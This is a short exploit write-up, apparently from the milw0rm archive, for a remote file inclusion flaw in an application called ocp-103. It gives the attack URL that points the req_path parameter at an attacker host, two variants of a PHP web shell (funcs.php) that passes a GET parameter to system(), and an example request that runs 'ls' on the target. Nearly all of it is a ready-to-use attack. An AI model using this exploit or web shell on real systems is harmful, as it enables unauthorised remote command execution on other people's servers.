36 lines
507 B
Text
Executable file
36 lines
507 B
Text
Executable file
http://localhost/ocp-103/index.php?req_path=http ://evil-host/
|
|
|
|
|
|
|
|
On your evil host you must put scipt funcs.php.
|
|
|
|
Example of funcs.php if your host doesn't support php.
|
|
|
|
|
|
|
|
<?php
|
|
|
|
$com = $_GET["com"];
|
|
|
|
system ("$com");
|
|
|
|
?>
|
|
|
|
|
|
|
|
Example of funcs.php if your host support php.
|
|
|
|
|
|
|
|
<?php
|
|
|
|
echo '<?php $com = $_GET["com"]; system ("$com"); ?>';
|
|
|
|
?>
|
|
|
|
|
|
|
|
http://localhost/ocp-103/index.php?req_path=http://evil-host/&com=ls
|
|
|
|
|
|
# milw0rm.com [2004-10-13]
|